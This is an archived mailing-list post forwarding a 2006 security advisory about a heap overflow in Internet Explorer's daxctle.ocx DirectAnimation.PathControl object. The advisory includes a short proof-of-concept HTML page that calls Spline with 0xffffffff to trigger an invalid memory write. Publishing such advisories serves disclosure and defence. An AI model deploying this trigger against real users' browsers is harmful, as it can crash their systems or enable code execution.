Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Tuesday, August 29, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow
> 
> 
> 
> Microsoft Internet Explorer daxctle.ocx Heap Overflow 
> 
> 
> 
> Microsoft Internet Explorer is vulnerable to an heap overflow 
> attack when it handles a DirectAnimation.PathControl COM object. 
> 
> 
> Vulnerable Systems: 
>  * Windows 2000/XP/2003 Internet Explorer 6.0 SP1 
> 
> When Internet Explorer handle DirectAnimation.PathControl COM 
> object(daxctle.ocx) \ Spline method, Set the first parameter 
> to 0xffffffff will triggers an invalid memory \ write, That 
> an attacker may DoS and possibly could execute arbitrary code. 
> 
> Exploit: 
> <!-- 
> // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability 
> // tested on Windows 2000 SP4/XP SP2/2003 SP1 
> 
> // http://www.xsec.org 
> // nop (nop#xsec.org) 
> 
> // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6} 
> // Info: Microsoft DirectAnimation Path 
> // ProgID: DirectAnimation.PathControl 
> // InprocServer32: C:\WINNT\system32\daxctle.ocx 
> 
> --!> 
> <html> 
> <head> 
> <title>test</title> 
> </head> 
> <body> 
> <script> 
> 
> var target = new ActiveXObject("DirectAnimation.PathControl"); 
> 
> target.Spline(0xffffffff, 1); 
> 
> </script> 
> </body> 
> </html> 
> 
> 
> Additional Information: 
> The information has been provided by nop <mailto:nop@xxxxxxxx> . 
> The original article can be found at: 
> http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19 
> 
> 
> ==============================================================




 




Copyright © Lexa Software, 1996-2009.